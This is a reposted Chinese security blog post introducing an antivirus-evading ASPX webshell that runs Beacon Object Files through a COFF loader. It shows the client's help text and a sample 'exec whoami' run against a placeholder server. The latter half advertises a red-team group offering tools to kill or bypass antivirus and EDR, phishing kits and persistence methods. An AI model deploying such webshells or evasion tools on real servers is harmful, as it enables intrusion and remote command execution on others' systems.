文章总结: 本文介绍ASPXWebShell免杀工具,该工具利用TrustedSec的COFF加载器技术,通过BOF文件在目标服务器执行命令。文档包含客户端使用方法和示例命令,同时强调仅限授权测试使用。后半部分为红队技术社群推广内容,列举多种免杀工具和渗透测试资源。 综合评分: 68 文章分类: 免杀,红队,WEB安全,渗透测试,安全工具
【免杀工具】ASPX_WebShell(BOF)
原创
Hello888 Hello888
安全天书
2026年4月22日 19:07 广西
在小说阅读器读本章
去阅读
本文所涉及的技术、思路和工具仅用于安全测试和防御研究,切勿将其用于非法入侵或攻击他人系统等目的,一切后果由使用者自行承担!!!
工具介绍
该ASPX webshell允许通过半交互式Python客户端在目标服务器上执行信标对象文件(BOF),它利用了源自 TrustedSec 的 COFF 加载器实现。CS_COFFLoader。
python3 webshell_bof_client.py http://1.2.3.4/bof.aspx[*] ASPX Web Shell With COFF Loader Client[*] Target: http://1.2.3.4/bof.aspx[*] Beacons: /usr/share/beacons[*] Type 'help' for available commands.
bof> help
Client for ASPX Web Shell with COFF LoaderBased on TrustedSec's COFFLoader: https://github.com/trustedsec/COFFLoader/tree/mainAuthor: Eugenie Potseluevskaya
For security research and authorized penetration testing only.Use strictly on systems you own or have explicit written permission to test.Unauthorized use is illegal and the author assumes no liability for misuse or damages resulting from this code.
Available commands: help Show this message.
list List available beacons in the beacons directory.
exec <beacon_name> [format_string [arg1 arg2 ...]] Execute a beacon against the server.
beacon_name Name of the beacon subdirectory. format_string bof_pack format string (b/i/s/z/Z). Omit if no args needed. arg1 arg2 ... Arguments matching the format string.
Examples: exec whoami exec mybeacon z "hello world" exec mybeacon zi "some string" 42 exec mybeacon zZ "str1" "widestr"
exit Quit the client.
bof> exec whoami[*] Sending 'whoami' (x64) to http://1.2.3.4/bof.aspx ...
── Output ──────────────────────────────────────
UserNameSID====================== ====================================IIS APPPOOL\DefaultAppPoolS-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
....
GitHub地址:
https://github.com/epotseluevskaya/ASPX_WebShell_COFFLoader
注意:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测。
红蓝偶像练习生小圈子
更多工具思路文章请加入纷传,圈子主要研究方向渗透测试、红蓝对抗、钓鱼手法思路、武器化,红队工具二开与免杀。圈内不定期分享红队技术文章,攻防经验总结以及自研工具与插件,目前圈子已满300人,欢迎各位进圈子交流学习!
**圈子目前更新相关技术文章:
* HeavenlyBypassAV内部版工具-轻松免杀各大杀软
-
HeBypassAV内部版Patch免杀工具-轻松绕过杀软EDR
-
Heavenly自动化红队后渗透工具免杀生成器
-
Heavenly白加黑自动化生成免杀工具
-
HeavenlyProtectionCS内部CS插件
-
冰蝎webshell免杀工具
-
哥斯拉webshell免杀工具
-
红队场景下lnk钓鱼Bypass免杀AV
-
Frp免杀隧道工具
-
1day和0dayPOC
-
lnk钓鱼思路视频讲解
-
lnk钓鱼Bypass天擎
-
msi钓鱼
-
chm钓鱼
-
Kill360核晶
-
AV对抗-致盲AV(核晶)
-
捆绑免杀360
-
Kill火绒
-
火绒6.0内存免杀
-
kill-windows Defender
-
Defender分离免杀
-
Defender知识点
-
EDR对抗思路
-
进程注入知识点
-
自启动思路
-
多种维权手法
-
Fscan免杀核晶
-
QVM解决思路
-
红队思路-钓鱼环境下小窗口截屏窃取
-
免杀Todesk/向日葵读取工具
-
渗透测试文章思路
-
内网对抗文章思路
-
*还有更多红队工具文章!期待您的加入!!!*
往期推荐**
安全天书免杀课来袭|助力实战免杀钓鱼(文末送福利)
Patch免杀0检测!!!绕过卡巴斯基、360、Defender、火绒等
【红队工具】红队内网后渗透CobaltStrike插件更新
全新版本–Heavenly自动化生成白加黑2.0版本
绕过360安全卫士实现维权****
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:安全天书 Hello888 Hello888《【免杀工具】ASPX_WebShell(BOF)》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论